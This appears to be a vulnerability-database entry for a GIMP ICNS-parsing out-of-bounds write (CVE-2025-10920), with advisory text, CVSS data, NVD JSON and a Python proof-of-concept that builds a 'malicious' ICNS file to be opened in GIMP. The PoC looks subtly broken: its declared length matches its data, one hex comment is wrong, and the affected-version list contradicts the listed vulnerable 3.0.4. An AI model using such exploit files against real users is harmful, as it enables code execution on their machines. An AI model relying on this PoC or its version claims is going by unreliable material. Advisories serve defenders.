CVE-2025-10920

Description

GIMP ICNS File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ICNS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27684.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:* - VULNERABLE

GIMP < 2.10.38

GIMP < 2.99.18 (development versions)

GIMP (all versions prior to security patch based on GitLab MR #2443)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-10920 PoC - GIMP ICNS File Parsing Out-of-Bounds Write
This PoC generates a malicious ICNS file that triggers an out-of-bounds
write vulnerability in GIMP's ICNS parser.

Author: Security Researcher
Reference: ZDI-CAN-27684
"""

import struct
import sys

def create_malicious_icns():
    """
    Create a malicious ICNS file that exploits CVE-2025-10920
    The vulnerability exists in GIMP's ICNS file parser due to
    insufficient validation of icon data size, leading to OOB write.
    """
    
    # ICNS Header
    # Magic number: 'icns' (0x69636e73)
    # File size will be calculated after building the file
    
    # Create a malformed icon entry with oversized data
    # Icon type: ic08 (128x128 PNG format) = 0x69630800
    icon_type = b'ic08'
    
    # The vulnerability: oversized icon data size
    # Normal size would be reasonable, but we set it larger than allocated buffer
    # This causes the parser to write beyond buffer boundaries
    oversized_length = 0x00010000  # 65536 bytes - larger than typical buffer
    
    # Icon data entry header (type + length)
    icon_entry = icon_type + struct.pack('>I', oversized_length)
    
    # Malicious payload data that will be written out of bounds
    # Fill with pattern that can help identify the overflow in debugging
    malicious_data = b'A' * (oversized_length - len(icon_entry))
    
    # Build the ICNS file
    icns_data = b'icns'  # Magic number
    
    # Calculate total file size
    file_size = 8 + len(icon_entry) + len(malicious_data)
    icns_data += struct.pack('>I', file_size)
    
    # Add the malicious icon entry
    icns_data += icon_entry + malicious_data
    
    return icns_data

def main():
    print("[*] CVE-2025-10920 PoC Generator")
    print("[*] GIMP ICNS Parsing Out-of-Bounds Write RCE")
    print("[*] Reference: ZDI-CAN-27684")
    print()
    
    # Generate malicious ICNS file
    malicious_icns = create_malicious_icns()
    
    # Write to file
    output_file = 'CVE-2025-10920 malicious.icns'
    with open(output_file, 'wb') as f:
        f.write(malicious_icns)
    
    print(f"[+] Created malicious ICNS file: {output_file}")
    print(f"[+] File size: {len(malicious_icns)} bytes")
    print()
    print("[!] Usage: Open this file with GIMP to trigger the vulnerability")
    print("[!] This PoC demonstrates the vulnerability and may cause GIMP to crash")
    print("[!] or potentially execute arbitrary code depending on system configuration")

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10920
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10920
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10920/
[4] VulDB https://vuldb.com/cve/CVE-2025-10920
[5] https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2443
[6] https://www.zerodayinitiative.com/advisories/ZDI-25-909/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10920", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:33.863", "lastModified": "2025-11-04T13:16:40.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GIMP ICNS File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of ICNS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27684."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "103D75C8-35B7-4E50-B75C-2D75294CB7AC"}]}]}], "references": [{"url": "https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2443", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-909/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}